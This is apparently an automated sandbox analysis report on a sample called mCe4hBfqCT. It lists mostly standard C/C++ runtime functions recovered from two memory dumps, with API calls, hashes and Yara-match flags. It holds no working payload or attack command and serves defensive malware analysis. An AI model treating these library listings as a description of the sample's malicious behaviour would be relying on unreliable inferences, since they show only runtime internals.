                                                  Function 0043F961 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                  • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                  • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                  • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                  Function 0304FBC8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                  • Instruction ID: 444fdcd607975854333fe7ef1be37faf6c481d2fb09d37b7419268b16084b730
                                                  • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                  • Instruction Fuzzy Hash: 4111B4BA506216BBDB20AF76DD449AB7ADCEFC7761B104A74FC15DB150DA308A00C6A0
                                                  Function 0043A3A3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                  • _free.LIBCMT ref: 0043A3F1
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 0043A3FC
                                                  • _free.LIBCMT ref: 0043A407
                                                  • _free.LIBCMT ref: 0043A45B
                                                  • _free.LIBCMT ref: 0043A466
                                                  • _free.LIBCMT ref: 0043A471
                                                  • _free.LIBCMT ref: 0043A47C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                  • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                  • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                  Function 0304A60A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0304A351: _free.LIBCMT ref: 0304A37A
                                                  • _free.LIBCMT ref: 0304A658
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304A663
                                                  • _free.LIBCMT ref: 0304A66E
                                                  • _free.LIBCMT ref: 0304A6C2
                                                  • _free.LIBCMT ref: 0304A6CD
                                                  • _free.LIBCMT ref: 0304A6D8
                                                  • _free.LIBCMT ref: 0304A6E3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                  • Instruction ID: 3606fc12e6c6d59937dadc3441a1324c3f99e1c5407ef2e14584b5acc1d7b1f9
                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                  • Instruction Fuzzy Hash: D51184B9A83B04BAD920F771CC46FCB779CDF80741F444834B6A9AE150FA64FA244A54
                                                  Function 00412412 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412420
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412426
                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412453
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041245D
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041246F
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                  • String ID:
                                                  • API String ID: 4227777306-0
                                                  • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                  • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                  • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                  • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                  Function 03022679 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 03022687
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 0302268D
                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226BA
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226C4
                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226D6
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030226EC
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030226FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                  • String ID:
                                                  • API String ID: 4227777306-0
                                                  • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                  • Instruction ID: a7ca5cb5b53d86a882088fb38590e6664e27033a7f16f72a7825c6f7b8db2fd2
                                                  • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                  • Instruction Fuzzy Hash: 8001A73A602225A7D750FFA5EC4CFEF3BACEF82A52B540C65F405E6060DB64D50497A8
                                                  Function 030224C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0302672B), ref: 030224D6
                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 030224E4
                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 030224F2
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0302672B), ref: 03022520
                                                  • GetProcAddress.KERNEL32(00000000), ref: 03022527
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 03022542
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 0302254E
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022564
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022572
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                  • String ID: kernel32.dll
                                                  • API String ID: 4179531150-1793498882
                                                  • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                  • Instruction ID: 1eec874785f83b17e16160f8fb126dbe2bb05ff20a0d957043b406c433d1f51f
                                                  • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                  • Instruction Fuzzy Hash: 2EF0F9799013303FE6107FB87C4986BBFACDD46A233150A36F411D21A1EB74C540876C
                                                  Function 0042FF04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: 11@$CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-3445089953
                                                  • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                  • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                  • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                  • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                  Function 030423BB Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0304260C,00000001,00000001,?), ref: 03042415
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0304260C,00000001,00000001,?,?,?,?), ref: 0304249B
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 03042595
                                                  • __freea.LIBCMT ref: 030425A2
                                                    • Part of subcall function 0304392E: RtlAllocateHeap.NTDLL(00000000,0301DAFC,00000000), ref: 03043960
                                                  • __freea.LIBCMT ref: 030425AB
                                                  • __freea.LIBCMT ref: 030425D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: aa9bc8e9f6ae49b47729d4d1ac391125a0a3f31e377bd1f53ff12dab55d8c0ce
                                                  • Instruction ID: 66b33fdbca241aa7a843b7ac6ebe9e1017fcfea55fc4cbb82b6427df6b877198
                                                  • Opcode Fuzzy Hash: aa9bc8e9f6ae49b47729d4d1ac391125a0a3f31e377bd1f53ff12dab55d8c0ce
                                                  • Instruction Fuzzy Hash: 2B51CFB2712216AFDB25DF64DC91EAFB7AEEB84650B194A38FC04DB140EB34DE50C650
                                                  Function 0303E439 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                  • Instruction ID: 61c139080ace0bfbad04af27a6ce4996800eb18287ef700a1329796b80841de3
                                                  • Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                  • Instruction Fuzzy Hash: D4511877906305ABDB64DB68CC40BEEB7EDAF8A360F184369F815D6181EB30D900C664
                                                  Function 03038F44 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 03038F97
                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 03038FB0
                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 03038FB7
                                                  • PMDtoOffset.LIBCMT ref: 03038FD6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FindInstanceTargetType$Offset
                                                  • String ID:
                                                  • API String ID: 1467055271-0
                                                  • Opcode ID: e6f20a520bc3681ee8ec9394f734c8bc4ff22510230f0e69c1b4f533b38a8f60
                                                  • Instruction ID: 2c09331cc67cbabb6b28428148575818429ad574eaaf6ab0153421ac42aaccea
                                                  • Opcode Fuzzy Hash: e6f20a520bc3681ee8ec9394f734c8bc4ff22510230f0e69c1b4f533b38a8f60
                                                  • Instruction Fuzzy Hash: 632124766063049FCF14DF68DC41AEEB7EDEB86720B14C69AF905D7280E735E9088A90
                                                  Function 0301545C Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                  • String ID:
                                                  • API String ID: 1687354797-0
                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction ID: 4e1a49f6c8d8300b091ceb2926ced95085e25ac5bc5e5474b82ae8af4fdef352
                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction Fuzzy Hash: 13219476C063089BDF05EBA8D840BEEBBF8AF89325F14401AE100BB280DB748A54C765
                                                  Function 00428DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,DB2DD188), ref: 00428E08
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                  • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,DB2DD188), ref: 00428E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                  • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                  • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                  Function 03039061 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,03039058,030369E9,03050927,00000008,03050C8C,?,?,?,?,03033CD2,?,?,0045A064), ref: 0303906F
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0303907D
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03039096
                                                  • SetLastError.KERNEL32(00000000,?,03039058,030369E9,03050927,00000008,03050C8C,?,?,?,?,03033CD2,?,?,0045A064), ref: 030390E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                  • Instruction ID: 33bdbf03bc8d23c84073e85f939dbed5ed90503cf25eb1988de12c14e94ca37a
                                                  • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                  • Instruction Fuzzy Hash: 0D01D83620FB116EE664A7F86C88AEA278CEB47575B240339E120891E1EF9248205984
                                                  Function 00404D77 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                  • int.LIBCPMT ref: 00404D9F
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                  • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                  • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                  • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                  Function 03014FDE Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03014FEF
                                                  • int.LIBCPMT ref: 03015006
                                                    • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
                                                    • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
                                                  • std::locale::_Getfacet.LIBCPMT ref: 0301500F
                                                  • std::_Facet_Register.LIBCPMT ref: 03015040
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03015056
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03015074
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                  • Instruction ID: 91633f2a895a0bb8d5a5eaf9044a2ba9d80b1be4165fba188995b98ece0713cd
                                                  • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                  • Instruction Fuzzy Hash: 0911CE36D023289BDB26EBA4CC44AEDB7B4AFC1710F184559E8156F2D0DB74DA14CBD0
                                                  Function 0040C1AE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                  • int.LIBCPMT ref: 0040C1D6
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                  • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                  Function 004054F7 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                  • int.LIBCPMT ref: 0040551F
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                  • std::_Facet_Register.LIBCPMT ref: 00405559
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                  • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                  • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                  • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                  Function 00405593 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                  • int.LIBCPMT ref: 004055BB
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                  • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                  • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                  • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                  • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
